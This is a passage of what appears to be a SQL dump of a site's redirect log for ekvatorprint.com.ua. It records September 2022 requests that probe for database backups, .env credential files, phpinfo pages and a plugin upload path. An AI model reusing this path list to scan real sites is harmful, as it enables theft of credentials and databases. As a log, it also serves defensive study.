14:45:24','0000-00-00 00:00:00',301),(24508,'https://ekvatorprint.com.ua/localhost_dump.sql.tar',NULL,'','',2,0,'2022-09-13 15:17:34','0000-00-00 00:00:00',301),(24509,'https://ekvatorprint.com.ua/wp-content/plugins/super-forms/uploads/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-09-13 15:35:34','0000-00-00 00:00:00',301),(24510,'https://ekvatorprint.com.ua/localhost-dump.sql.tar',NULL,'','',2,0,'2022-09-13 15:53:13','0000-00-00 00:00:00',301),(24511,'https://ekvatorprint.com.ua/localhostbackup.sql.tar',NULL,'','',2,0,'2022-09-13 16:26:45','0000-00-00 00:00:00',301),(24512,'https://ekvatorprint.com.ua/localhost_backup.sql.tar',NULL,'','',2,0,'2022-09-13 17:35:42','0000-00-00 00:00:00',301),(24513,'https://ekvatorprint.com.ua/localhost-backup.sql.tar',NULL,'','',1,0,'2022-09-13 18:42:05','0000-00-00 00:00:00',301),(24514,'https://ekvatorprint.com.ua/backuplocalhost.sql.tar',NULL,'','',2,0,'2022-09-13 19:09:55','0000-00-00 00:00:00',301),(24515,'https://ekvatorprint.com.ua/backup-localhost.sql.tar',NULL,'','',2,0,'2022-09-13 20:03:50','0000-00-00 00:00:00',301),(24516,'https://ekvatorprint.com.ua/backup_localhost.sql.tar',NULL,'','',2,0,'2022-09-13 22:08:10','0000-00-00 00:00:00',301),(24517,'https://ekvatorprint.com.ua/ekvatorprintdb.sql.tar',NULL,'','',2,0,'2022-09-14 00:05:41','0000-00-00 00:00:00',301),(24518,'https://ekvatorprint.com.ua/ekvatorprint-db.sql.tar',NULL,'','',2,0,'2022-09-14 01:44:27','0000-00-00 00:00:00',301),(24519,'https://ekvatorprint.com.ua/ekvatorprint-database.sql.tar',NULL,'','',2,0,'2022-09-14 03:45:59','0000-00-00 00:00:00',301),(24520,'https://ekvatorprint.com.ua/ekvatorprint_dump.sql.tar',NULL,'','',2,0,'2022-09-14 04:11:31','0000-00-00 00:00:00',301),(24521,'https://ekvatorprint.com.ua/ekvatorprint-dump.sql.tar',NULL,'','',2,0,'2022-09-14 05:07:00','0000-00-00 00:00:00',301),(24522,'https://ekvatorprint.com.ua/ekvatorprintbackup.sql.tar',NULL,'','',2,0,'2022-09-14 05:31:48','0000-00-00 00:00:00',301),(24523,'https://ekvatorprint.com.ua/ekvatorprint-backup.sql.tar',NULL,'','',3,0,'2022-09-14 12:41:48','0000-00-00 00:00:00',301),(24524,'https://ekvatorprint.com.ua/backupekvatorprint.sql.tar',NULL,'','',4,0,'2022-09-14 13:18:47','0000-00-00 00:00:00',301),(24525,'https://ekvatorprint.com.ua/backup-ekvatorprint.sql.tar',NULL,'','',4,0,'2022-09-14 13:40:59','0000-00-00 00:00:00',301),(24526,'https://ekvatorprint.com.ua/backup_ekvatorprint.sql.tar',NULL,'','',3,0,'2022-09-14 14:15:07','0000-00-00 00:00:00',301),(24527,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.sql.tar',NULL,'','',5,0,'2022-09-14 14:37:05','0000-00-00 00:00:00',301),(24528,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.sql.tar',NULL,'','',5,0,'2022-09-14 15:25:13','0000-00-00 00:00:00',301),(24529,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.sql.tar',NULL,'','',4,0,'2022-09-14 15:35:12','0000-00-00 00:00:00',301),(24530,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.sql.tar',NULL,'','',5,0,'2022-09-14 16:08:30','0000-00-00 00:00:00',301),(24531,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.sql.tar',NULL,'','',3,0,'2022-09-14 17:07:05','0000-00-00 00:00:00',301),(24532,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.sql.tar',NULL,'','',6,0,'2022-09-14 17:50:35','0000-00-00 00:00:00',301),(24533,'https://ekvatorprint.com.ua/en/printing-on-canvas',NULL,'https://ekvatorprint.com.ua/en/printing-on-canvas','',8,0,'2022-09-14 18:06:37','0000-00-00 00:00:00',301),(24534,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.sql.tar',NULL,'','',5,0,'2022-09-14 18:09:50','0000-00-00 00:00:00',301),(24535,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.sql.tar',NULL,'','',6,0,'2022-09-14 18:31:01','0000-00-00 00:00:00',301),(24536,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.sql.tar',NULL,'','',6,0,'2022-09-14 19:10:34','0000-00-00 00:00:00',301),(24537,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.sql.tar',NULL,'','',6,0,'2022-09-14 19:36:00','0000-00-00 00:00:00',301),(24538,'https://ekvatorprint.com.ua/.env.backup',NULL,'','',1,0,'2022-09-14 19:43:40','0000-00-00 00:00:00',301),(24539,'https://ekvatorprint.com.ua/.env.dev',NULL,'','',1,0,'2022-09-14 19:43:41','0000-00-00 00:00:00',301),(24540,'https://ekvatorprint.com.ua/.env.docker.dev',NULL,'','',1,0,'2022-09-14 19:43:42','0000-00-00 00:00:00',301),(24541,'https://ekvatorprint.com.ua/.env.php',NULL,'','',1,0,'2022-09-14 19:43:43','0000-00-00 00:00:00',301),(24542,'https://ekvatorprint.com.ua/.env.prod',NULL,'','',1,0,'2022-09-14 19:43:43','0000-00-00 00:00:00',301),(24543,'https://ekvatorprint.com.ua/.env.sample.php',NULL,'','',1,0,'2022-09-14 19:43:44','0000-00-00 00:00:00',301),(24544,'https://ekvatorprint.com.ua/.env.test',NULL,'','',1,0,'2022-09-14 19:43:44','0000-00-00 00:00:00',301),(24545,'https://ekvatorprint.com.ua/.env.test.local',NULL,'','',1,0,'2022-09-14 19:43:45','0000-00-00 00:00:00',301),(24546,'https://ekvatorprint.com.ua/.env~',NULL,'','',1,0,'2022-09-14 19:43:45','0000-00-00 00:00:00',301),(24547,'https://ekvatorprint.com.ua/.vscode/.env',NULL,'','',1,0,'2022-09-14 19:43:50','0000-00-00 00:00:00',301),(24548,'https://ekvatorprint.com.ua/1board/.env',NULL,'','',1,0,'2022-09-14 19:43:51','0000-00-00 00:00:00',301),(24549,'https://ekvatorprint.com.ua/2018/.env',NULL,'','',1,0,'2022-09-14 19:43:51','0000-00-00 00:00:00',301),(24550,'https://ekvatorprint.com.ua/2019/.env',NULL,'','',1,0,'2022-09-14 19:43:51','0000-00-00 00:00:00',301),(24551,'https://ekvatorprint.com.ua/2020/.env',NULL,'','',1,0,'2022-09-14 19:43:51','0000-00-00 00:00:00',301),(24552,'https://ekvatorprint.com.ua/4walls/.env',NULL,'','',1,0,'2022-09-14 19:43:51','0000-00-00 00:00:00',301),(24553,'https://ekvatorprint.com.ua/6p6/.env',NULL,'','',1,0,'2022-09-14 19:43:52','0000-00-00 00:00:00',301),(24554,'https://ekvatorprint.com.ua/alkatreszproject/.env',NULL,'','',1,0,'2022-09-14 19:43:52','0000-00-00 00:00:00',301),(24555,'https://ekvatorprint.com.ua/archipel/.env',NULL,'','',1,0,'2022-09-14 19:43:52','0000-00-00 00:00:00',301),(24556,'https://ekvatorprint.com.ua/assignment3/.env',NULL,'','',1,0,'2022-09-14 19:43:52','0000-00-00 00:00:00',301),(24557,'https://ekvatorprint.com.ua/assignment4/.env',NULL,'','',1,0,'2022-09-14 19:43:52','0000-00-00 00:00:00',301),(24558,'https://ekvatorprint.com.ua/berg/.env',NULL,'','',1,0,'2022-09-14 19:43:53','0000-00-00 00:00:00',301),(24559,'https://ekvatorprint.com.ua/chai/.env',NULL,'','',1,0,'2022-09-14 19:43:53','0000-00-00 00:00:00',301),(24560,'https://ekvatorprint.com.ua/clientapp/.env',NULL,'','',1,0,'2022-09-14 19:43:53','0000-00-00 00:00:00',301),(24561,'https://ekvatorprint.com.ua/containerregistry/.env',NULL,'','',1,0,'2022-09-14 19:43:53','0000-00-00 00:00:00',301),(24562,'https://ekvatorprint.com.ua/exercise.frontend/.env',NULL,'','',1,0,'2022-09-14 19:43:53','0000-00-00 00:00:00',301),(24563,'https://ekvatorprint.com.ua/exercise.frontend/train/.env',NULL,'','',1,0,'2022-09-14 19:43:54','0000-00-00 00:00:00',301),(24564,'https://ekvatorprint.com.ua/fe/huey/.env',NULL,'','',1,0,'2022-09-14 19:43:54','0000-00-00 00:00:00',301),(24565,'https://ekvatorprint.com.ua/huniv_migration/.env',NULL,'','',1,0,'2022-09-14 19:43:54','0000-00-00 00:00:00',301),(24566,'https://ekvatorprint.com.ua/hash/.env',NULL,'','',1,0,'2022-09-14 19:43:54','0000-00-00 00:00:00',301),(24567,'https://ekvatorprint.com.ua/helmetjs/.env',NULL,'','',1,0,'2022-09-14 19:43:54','0000-00-00 00:00:00',301),(24568,'https://ekvatorprint.com.ua/imagebord/.env',NULL,'','',1,0,'2022-09-14 19:43:55','0000-00-00 00:00:00',301),(24569,'https://ekvatorprint.com.ua/instantcv/server/.env',NULL,'','',1,0,'2022-09-14 19:43:55','0000-00-00 00:00:00',301),(24570,'https://ekvatorprint.com.ua/kubernetes/.env',NULL,'','',1,0,'2022-09-14 19:43:55','0000-00-00 00:00:00',301),(24571,'https://ekvatorprint.com.ua/lara/.env',NULL,'','',1,0,'2022-09-14 19:43:55','0000-00-00 00:00:00',301),(24572,'https://ekvatorprint.com.ua/library/.env',NULL,'','',1,0,'2022-09-14 19:43:55','0000-00-00 00:00:00',301),(24573,'https://ekvatorprint.com.ua/modix/clientapp/.env',NULL,'','',1,0,'2022-09-14 19:43:56','0000-00-00 00:00:00',301),(24574,'https://ekvatorprint.com.ua/nuke.app.ui/.env',NULL,'','',1,0,'2022-09-14 19:43:56','0000-00-00 00:00:00',301),(24575,'https://ekvatorprint.com.ua/passportjs/.env',NULL,'','',1,0,'2022-09-14 19:43:56','0000-00-00 00:00:00',301),(24576,'https://ekvatorprint.com.ua/serve_time_server/.env',NULL,'','',1,0,'2022-09-14 19:43:56','0000-00-00 00:00:00',301),(24577,'https://ekvatorprint.com.ua/server_with_db/.env',NULL,'','',1,0,'2022-09-14 19:43:57','0000-00-00 00:00:00',301),(24578,'https://ekvatorprint.com.ua/simple_server/.env',NULL,'','',1,0,'2022-09-14 19:44:02','0000-00-00 00:00:00',301),(24579,'https://ekvatorprint.com.ua/socketio/.env',NULL,'','',1,0,'2022-09-14 19:44:02','0000-00-00 00:00:00',301),(24580,'https://ekvatorprint.com.ua/sources/api/.env',NULL,'','',1,0,'2022-09-14 19:44:02','0000-00-00 00:00:00',301),(24581,'https://ekvatorprint.com.ua/spotiapps/.env',NULL,'','',1,0,'2022-09-14 19:44:03','0000-00-00 00:00:00',301),(24582,'https://ekvatorprint.com.ua/travel_form/.env',NULL,'','',1,0,'2022-09-14 19:44:03','0000-00-00 00:00:00',301),(24583,'https://ekvatorprint.com.ua/user_info/.env',NULL,'','',1,0,'2022-09-14 19:44:03','0000-00-00 00:00:00',301),(24584,'https://ekvatorprint.com.ua/_inc/.env',NULL,'','',1,0,'2022-09-14 19:44:03','0000-00-00 00:00:00',301),(24585,'https://ekvatorprint.com.ua/_staff/.env',NULL,'','',1,0,'2022-09-14 19:44:04','0000-00-00 00:00:00',301),(24586,'https://ekvatorprint.com.ua/academy2019/.env',NULL,'','',1,0,'2022-09-14 19:44:04','0000-00-00 00:00:00',301),(24587,'https://ekvatorprint.com.ua/acellemail/.env',NULL,'','',1,0,'2022-09-14 19:44:04','0000-00-00 00:00:00',301),(24588,'https://ekvatorprint.com.ua/acme-challenge/.env',NULL,'','',1,0,'2022-09-14 19:44:04','0000-00-00 00:00:00',301),(24589,'https://ekvatorprint.com.ua/acme/.env',NULL,'','',1,0,'2022-09-14 19:44:04','0000-00-00 00:00:00',301),(24590,'https://ekvatorprint.com.ua/acme_challenges/.env',NULL,'','',1,0,'2022-09-14 19:44:05','0000-00-00 00:00:00',301),(24591,'https://ekvatorprint.com.ua/actions-server/.env',NULL,'','',1,0,'2022-09-14 19:44:05','0000-00-00 00:00:00',301),(24592,'https://ekvatorprint.com.ua/admin-app/.env',NULL,'','',1,0,'2022-09-14 19:44:05','0000-00-00 00:00:00',301),(24593,'https://ekvatorprint.com.ua/admin/phpinfo.php',NULL,'','',1,0,'2022-09-14 19:44:05','0000-00-00 00:00:00',301),(24594,'https://ekvatorprint.com.ua/admin/server_info.php',NULL,'','',1,0,'2022-09-14 19:44:06','0000-00-00 00:00:00',301),(24595,'https://ekvatorprint.com.ua/admin/sys_phpinfo.php',NULL,'','',1,0,'2022-09-14 19:44:06','0000-00-00 00:00:00',301),(24596,'https://ekvatorprint.com.ua/admincontrol/sys_phpinfo.php',NULL,'','',1,0,'2022-09-14 19:44:16','0000-00-00 00:00:00',301),(24597,'https://ekvatorprint.com.ua/adminer/.env',NULL,'','',1,0,'2022-09-14 19:44:21','0000-00-00 00:00:00',301),(24598,'https://ekvatorprint.com.ua/ads_qu_merge/.env',NULL,'','',1,0,'2022-09-14 19:44:22','0000-00-00 00:00:00',301),(24599,'https://ekvatorprint.com.ua/adv/.env',NULL,'','',1,0,'2022-09-14 19:44:22','0000-00-00 00:00:00',301),(24600,'https://ekvatorprint.com.ua/adv2/.env',NULL,'','',1,0,'2022-09-14 19:44:22','0000-00-00 00:00:00',301),(24601,'https://ekvatorprint.com.ua/adv3/.env',NULL,'','',1,0,'2022-09-14 19:44:22','0000-00-00 00:00:00',301),(24602,'https://ekvatorprint.com.ua/advanced/.env',NULL,'','',1,0,'2022-09-14 19:44:22','0000-00-00 00:00:00',301),(24603,'https://ekvatorprint.com.ua/afasio/.env',NULL,'','',1,0,'2022-09-14 19:44:24','0000-00-00 00:00:00',301),(24604,'https://ekvatorprint.com.ua/agc_app/.env',NULL,'','',1,0,'2022-09-14 19:44:24','0000-00-00 00:00:00',301),(24605,'https://ekvatorprint.com.ua/agora/.env',NULL,'','',1,0,'2022-09-14 19:44:24','0000-00-00 00:00:00',301),(24606,'https://ekvatorprint.com.ua/albraj/.env',NULL,'','',1,0,'2022-09-14 19:44:24','0000-00-00 00:00:00',301),(24607,'https://ekvatorprint.com.ua/aliceapi/.env',NULL,'','',1,0,'2022-09-14 19:44:25','0000-00-00 00:00:00',301),(24608,'https://ekvatorprint.com.ua/all/.env',NULL,'','',1,0,'2022-09-14 19:44:26','0000-00-00 00:00:00',301),(24609,'https://ekvatorprint.com.ua/alpha/.env',NULL,'','',1,0,'2022-09-14 19:44:26','0000-00-00 00:00:00',301),(24610,'https://ekvatorprint.com.ua/alquimialaravel/.env',NULL,'','',1,0,'2022-09-14 19:44:26','0000-00-00 00:00:00',301),(24611,'https://ekvatorprint.com.ua/anaconda/.env',NULL,'','',1,0,'2022-09-14 19:44:26','0000-00-00 00:00:00',301),(24612,'https://ekvatorprint.com.ua//api/aws/index.js',NULL,'','',1,0,'2022-09-14 19:44:32','0000-00-00 00:00:00',301),(24613,'https://ekvatorprint.com.ua/api/config.env',NULL,'','',1,0,'2022-09-14 19:44:32','0000-00-00 00:00:00',301),(24614,'https://ekvatorprint.com.ua/api/shared/.env',NULL,'','',1,0,'2022-09-14 19:44:32','0000-00-00 00:00:00',301),(24615,'https://ekvatorprint.com.ua/api/shared/config.env',NULL,'','',1,0,'2022-09-14 19:44:32','0000-00-00 00:00:00',301),(24616,'https://ekvatorprint.com.ua/api/shared/config/.env',NULL,'','',1,0,'2022-09-14 19:44:33','0000-00-00 00:00:00',301),(24617,'https://ekvatorprint.com.ua/api/shared/config/config.env',NULL,'','',1,0,'2022-09-14 19:44:33','0000-00-00 00:00:00',301),(24618,'https://ekvatorprint.com.ua/api/src/.env',NULL,'','',1,0,'2022-09-14 19:44:33','0000-00-00 00:00:00',301),(24619,'https://ekvatorprint.com.ua/api1/.env',NULL,'','',1,0,'2022-09-14 19:44:33','0000-00-00 00:00:00',301),(24620,'https://ekvatorprint.com.ua/api2/.env',NULL,'','',1,0,'2022-09-14 19:44:33','0000-00-00 00:00:00',301),(24621,'https://ekvatorprint.com.ua/api3/.env',NULL,'','',1,0,'2022-09-14 19:44:34','0000-00-00 00:00:00',301),(24622,'https://ekvatorprint.com.ua/api4/.env',NULL,'','',1,0,'2022-09-14 19:44:34','0000-00-00 00:00:00',301),(24623,'https://ekvatorprint.com.ua/api5/.env',NULL,'','',1,0,'2022-09-14 19:44:34','0000-00-00 00:00:00',301),(24624,'https://ekvatorprint.com.ua/api_muvin/.env',NULL,'','',1,0,'2022-09-14 19:44:34','0000-00-00 00:00:00',301),(24625,'https://ekvatorprint.com.ua/api_source/.env',NULL,'','',1,0,'2022-09-14 19:44:34','0000-00-00 00:00:00',301),(24626,'https://ekvatorprint.com.ua/apimotor/.env',NULL,'','',1,0,'2022-09-14 19:44:35','0000-00-00 00:00:00',301),(24627,'https://ekvatorprint.com.ua/apitotsurvey/.env',NULL,'','',1,0,'2022-09-14 19:44:36','0000-00-00 00:00:00',301),(24628,'https://ekvatorprint.com.ua/app-order-client/.env',NULL,'','',1,0,'2022-09-14 19:44:36','0000-00-00 00:00:00',301),(24629,'https://ekvatorprint.com.ua//app.js',NULL,'','',1,0,'2022-09-14 19:44:36','0000-00-00 00:00:00',301),(24630,'https://ekvatorprint.com.ua/app/client/.env',NULL,'','',1,0,'2022-09-14 19:44:37','0000-00-00 00:00:00',301),(24631,'https://ekvatorprint.com.ua//app/config/db.config.js',NULL,'','',1,0,'2022-09-14 19:44:37','0000-00-00 00:00:00',301),(24632,'https://ekvatorprint.com.ua/app/config/dev/.env',NULL,'','',1,0,'2022-09-14 19:44:37','0000-00-00 00:00:00',301),(24633,'https://ekvatorprint.com.ua/app/frontend/.env',NULL,'','',1,0,'2022-09-14 19:44:37','0000-00-00 00:00:00',301),(24634,'https://ekvatorprint.com.ua/app1-static/.env',NULL,'','',1,0,'2022-09-14 19:44:38','0000-00-00 00:00:00',301),(24635,'https://ekvatorprint.com.ua/app2-static/.env',NULL,'','',1,0,'2022-09-14 19:44:38','0000-00-00 00:00:00',301),(24636,'https://ekvatorprint.com.ua/app_dir/.env',NULL,'','',1,0,'2022-09-14 19:44:38','0000-00-00 00:00:00',301),(24637,'https://ekvatorprint.com.ua/app_nginx_static_path/.env',NULL,'','',1,0,'2022-09-14 19:44:38','0000-00-00 00:00:00',301),(24638,'https://ekvatorprint.com.ua/apps/client/.env',NULL,'','',1,0,'2022-09-14 19:44:40','0000-00-00 00:00:00',301),(24639,'https://ekvatorprint.com.ua/aptapi/.env',NULL,'','',1,0,'2022-09-14 19:44:40','0000-00-00 00:00:00',301),(24640,'https://ekvatorprint.com.ua/phpinf0.php',NULL,'','',1,0,'2022-09-14 21:20:10','0000-00-00 00:00:00',301),(24641,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.sql.tar',NULL,'','',5,0,'2022-09-14 22:56:01','0000-00-00 00:00:00',301),(24642,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.sql.tar',NULL,'','',6,0,'2022-09-14 23:04:22','0000-00-00 00:00:00',301),(24643,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.sql.tar',NULL,'','',6,0,'2022-09-14 23:36:40','0000-00-00 00:00:00',301),(24644,'https://ekvatorprint.com.ua/dbdump.zip',NULL,'','',6,0,'2022-09-15 00:09:38','0000-00-00 00:00:00',301),(24645,'https://ekvatorprint.com.ua/localhost.zip',NULL,'','',7,0,'2022-09-15 00:52:54','0000-00-00 00:00:00',301),(24646,'https://ekvatorprint.com.ua/localhostdb.zip',NULL,'','',7,0,'2022-09-15 01:19:30','0000-00-00 00:00:00',301),(24647,'https://ekvatorprint.com.ua/localhost_db.zip',NULL,'','',7,0,'2022-09-15 01:37:17','0000-00-00 00:00:00',301),(24648,'https://ekvatorprint.com.ua/localhost-db.zip',NULL,'','',5,0,'2022-09-15 02:14:35','0000-00-00 00:00:00',301),(24649,'https://ekvatorprint.com.ua/localhost_database.zip',NULL,'','',6,0,'2022-09-15 02:30:44','0000-00-00 00:00:00',301),(24650,'https://ekvatorprint.com.ua/localhost-database.zip',NULL,'','',7,0,'2022-09-15 03:05:44','0000-00-00 00:00:00',301),(24651,'https://ekvatorprint.com.ua/localhost_dump.zip',NULL,'','',7,0,'2022-09-15 04:09:17','0000-00-00 00:00:00',301),(24652,'https://ekvatorprint.com.ua/localhostbackup.zip',NULL,'','',3,0,'2022-09-15 05:19:47','0000-00-00 00:00:00',301),(24653,'https://ekvatorprint.com.ua/localhost-dump.zip',NULL,'','',3,0,'2022-09-15 05:37:41','0000-00-00 00:00:00',301),(24654,'https://ekvatorprint.com.ua/localhost_backup.zip',NULL,'','',4,0,'2022-09-15 05:43:40','0000-00-00 00:00:00',301),(24655,'https://ekvatorprint.com.ua/localhost-backup.zip',NULL,'','',4,0,'2022-09-15 05:59:12','0000-00-00 00:00:00',301),(24656,'https://ekvatorprint.com.ua/backuplocalhost.zip',NULL,'','',5,0,'2022-09-15 06:51:40','0000-00-00 00:00:00',301),(24657,'https://ekvatorprint.com.ua/backup-localhost.zip',NULL,'','',5,0,'2022-09-15 07:09:33','0000-00-00 00:00:00',301),(24658,'https://ekvatorprint.com.ua/backup_localhost.zip',NULL,'','',5,0,'2022-09-15 07:57:43','0000-00-00 00:00:00',301),(24659,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.zip',NULL,'','',6,0,'2022-09-15 08:51:46','0000-00-00 00:00:00',301),(24660,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.zip',NULL,'','',6,0,'2022-09-15 09:24:37','0000-00-00 00:00:00',301),(24661,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.zip',NULL,'','',5,0,'2022-09-15 10:46:49','0000-00-00 00:00:00',301),(24662,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.zip',NULL,'','',2,0,'2022-09-15 12:29:06','0000-00-00 00:00:00',301),(24663,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.zip',NULL,'','',2,0,'2022-09-15 13:09:52','0000-00-00 00:00:00',301),(24664,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.zip',NULL,'','',2,0,'2022-09-15 13:30:01','0000-00-00 00:00:00',301),(24665,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.zip',NULL,'','',5,0,'2022-09-15 14:24:35','0000-00-00 00:00:00',301),(24666,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.zip',NULL,'','',1,0,'2022-09-15 17:26:23','0000-00-00 00:00:00',301),(24667,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.zip',NULL,'','',1,0,'2022-09-15 17:43:05','0000-00-00 00:00:00',301),(24668,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.zip',NULL,'','',1,0,'2022-09-15 18:08:13','0000-00-00 00:00:00',301),(24669,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.zip',NULL,'','',2,0,'2022-09-15 18:19:30','0000-00-00 00:00:00',301),(24670,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.zip',NULL,'','',2,0,'2022-09-15 19:08:40','0000-00-00 00:00:00',301),(24671,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.zip',NULL,'','',3,0,'2022-09-15 19:20:00','0000-00-00 00:00:00',301),(24672,'https://ekvatorprint.com.ua/ekvatorprintdb.zip',NULL,'','',2,0,'2022-09-15 20:59:28','0000-00-00 00:00:00',301),(24673,'https://ekvatorprint.com.ua/ekvatorprint_db.zip',NULL,'','',1,0,'2022-09-15 21:35:34','0000-00-00 00:00:00',301),(24674,'https://ekvatorprint.com.ua/ekvatorprint-db.zip',NULL,'','',1,0,'2022-09-15 21:55:08','0000-00-00 00:00:00',301),(24675,'https://ekvatorprint.com.ua/localhost_db.tar',NULL,'','',4,0,'2022-09-17 10:51:57','0000-00-00 00:00:00',301),(24676,'https://ekvatorprint.com.ua/ekvatorprint_dump.tar.gz',NULL,'','',2,0,'2022-09-17 10:56:35','0000-00-00 00:00:00',301),(24677,'https://ekvatorprint.com.ua/ekvatorprint-dump.tar.gz',NULL,'','',2,0,'2022-09-17 11:20:36','0000-00-00 00:00:00',301),(24678,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.tar.gz',NULL,'','',2,0,'2022-09-17 11:24:35','0000-00-00 00:00:00',301),(24679,'https://ekvatorprint.com.ua/localhost.tar',NULL,'','',3,0,'2022-09-17 11:33:22','0000-00-00 00:00:00',301),(24680,'https://ekvatorprint.com.ua/dbdump.tar',NULL,'','',2,0,'2022-09-17 11:39:34','0000-00-00 00:00:00',301),(24681,'https://ekvatorprint.com.ua/ekvatorprintbackup.tar.gz',NULL,'','',2,0,'2022-09-17 11:40:36','0000-00-00 00:00:00',301),(24682,'https://ekvatorprint.com.ua/localhostdb.tar',NULL,'','',3,0,'2022-09-17 12:34:47','0000-00-00 00:00:00',301),(24683,'https://ekvatorprint.com.ua/ekvatorprint-backup.tar.gz',NULL,'','',2,0,'2022-09-17 12:58:17','0000-00-00 00:00:00',301),(24684,'https://ekvatorprint.com.ua/localhost-db.tar',NULL,'','',3,0,'2022-09-17 13:03:12','0000-00-00 00:00:00',301),(24685,'https://ekvatorprint.com.ua/ekvatorprint.com.uabackup.tar.gz',NULL,'','',2,0,'2022-09-17 13:05:34','0000-00-00 00:00:00',301),(24686,'https://ekvatorprint.com.ua/localhost_database.tar',NULL,'','',4,0,'2022-09-17 13:15:16','0000-00-00 00:00:00',301),(24687,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.tar.gz',NULL,'','',2,0,'2022-09-17 13:22:09','0000-00-00 00:00:00',301),(24688,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.tar.gz',NULL,'','',2,0,'2022-09-17 13:53:13','0000-00-00 00:00:00',301),(24689,'https://ekvatorprint.com.ua/backupekvatorprint.tar.gz',NULL,'','',2,0,'2022-09-17 14:10:22','0000-00-00 00:00:00',301),(24690,'https://ekvatorprint.com.ua/backupekvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2022-09-17 14:13:30','0000-00-00 00:00:00',301),(24691,'https://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2022-09-17 14:35:37','0000-00-00 00:00:00',301),(24692,'https://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2022-09-17 15:01:35','0000-00-00 00:00:00',301),(24693,'https://ekvatorprint.com.ua/localhost_dump.tar',NULL,'','',4,0,'2022-09-17 15:26:08','0000-00-00 00:00:00',301),(24694,'https://ekvatorprint.com.ua/backup-ekvatorprint.tar.gz',NULL,'','',1,0,'2022-09-17 15:33:41','0000-00-00 00:00:00',301),(24695,'https://ekvatorprint.com.ua/localhost-database.tar',NULL,'','',3,0,'2022-09-17 15:34:51','0000-00-00 00:00:00',301),(24696,'https://ekvatorprint.com.ua/localhost-dump.tar',NULL,'','',4,0,'2022-09-17 15:37:03','0000-00-00 00:00:00',301),(24697,'https://ekvatorprint.com.ua/localhostbackup.tar',NULL,'','',4,0,'2022-09-17 16:10:15','0000-00-00 00:00:00',301),(24698,'https://ekvatorprint.com.ua/backup_ekvatorprint.tar.gz',NULL,'','',1,0,'2022-09-17 16:11:45','0000-00-00 00:00:00',301),(24699,'https://ekvatorprint.com.ua/localhost_backup.tar',NULL,'','',4,0,'2022-09-17 16:41:41','0000-00-00 00:00:00',301),(24700,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.tar.gz',NULL,'','',1,0,'2022-09-17 17:08:08','0000-00-00 00:00:00',301),(24701,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.tar.gz',NULL,'','',1,0,'2022-09-17 17:48:35','0000-00-00 00:00:00',301),(24702,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.tar.gz',NULL,'','',1,0,'2022-09-17 18:15:37','0000-00-00 00:00:00',301),(24703,'https://ekvatorprint.com.ua/backuplocalhost.tar',NULL,'','',5,0,'2022-09-17 19:11:05','0000-00-00 00:00:00',301),(24704,'https://ekvatorprint.com.ua/backup-localhost.tar',NULL,'','',5,0,'2022-09-17 19:41:33','0000-00-00 00:00:00',301),(24705,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.tar.gz',NULL,'','',1,0,'2022-09-17 19:42:23','0000-00-00 00:00:00',301),(24706,'https://ekvatorprint.com.ua/localhost-backup.tar',NULL,'','',3,0,'2022-09-17 19:46:55','0000-00-00 00:00:00',301),(24707,'https://ekvatorprint.com.ua/backup_localhost.tar',NULL,'','',6,0,'2022-09-17 20:16:16','0000-00-00 00:00:00',301),(24708,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.tar.gz',NULL,'','',1,0,'2022-09-17 20:16:37','0000-00-00 00:00:00',301),(24709,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.tar.gz',NULL,'','',1,0,'2022-09-17 20:29:09','0000-00-00 00:00:00',301),(24710,'https://ekvatorprint.com.ua/ekvatorprint.com.uadb.tar',NULL,'','',5,0,'2022-09-17 21:43:15','0000-00-00 00:00:00',301),(24711,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.tar',NULL,'','',4,0,'2022-09-17 22:13:56','0000-00-00 00:00:00',301),(24712,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-db.tar',NULL,'','',5,0,'2022-09-17 23:32:04','0000-00-00 00:00:00',301),(24713,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_database.tar',NULL,'','',5,0,'2022-09-18 00:30:19','0000-00-00 00:00:00',301),(24714,'https://ekvatorprint.com.ua/ekvatorprint.com.ua-database.tar',NULL,'','',5,0,'2022-09-18 00:53:57','0000-00-00 00:00:00',301),(24715,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.tar',NULL,'','',3,0,'2022-09-18 